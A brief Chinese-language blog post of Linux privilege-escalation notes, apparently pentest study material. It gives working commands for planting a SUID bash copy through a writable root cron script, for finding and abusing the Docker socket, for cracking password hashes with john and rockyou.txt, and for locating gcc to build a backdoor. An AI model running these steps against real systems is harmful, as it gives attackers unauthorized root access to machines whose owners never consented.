Maojui

攻擊伺服器 (五) | 提權 - Linux

2022-08-05

PEASS-ng/linPEAS at master · carlospolop/PEASS-ng

CheckList

Checklist - Linux Privilege Escalation

Anacron

如果 cron.d 底下有指令會用 root 來執行 jobs,那個 job 剛好也有 有編輯權限的檔案 (target.sh)

  • 在 target 內加入以下這行,讓 root 來複製一份 bash ,打開 s 權限
1
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > target.sh # target.sh 是會被 root 執行的腳本
  • 等待 root 執行,就可以用 bash 來提權成為 root 了
1
/tmp/bash -p

Abusing Docker Socket for Privilege Escalation

  • 如果你的使用者有在 docker group 中

    • 先找到他.

      1
      find / -name docker.sock 2>/dev/null
    • 檢查 docker.sock 是不是可寫

      1
      2
      $ ls -al /var/run/docker.sock
      srw-rw---- 1 root docker 0 Apr 17 08:46 /var/run/docker.sock
    • 用 -v 把自己可控的資料夾變成 root 權限 (-v /:/host)

暴力破解密碼 (Brute Force Password)

  • Rockyou.txt
1
john --wordlist=rockyou.txt pass.txt

找 GCC 自己編後門

1
find / -name gcc -type f 2>/dev/null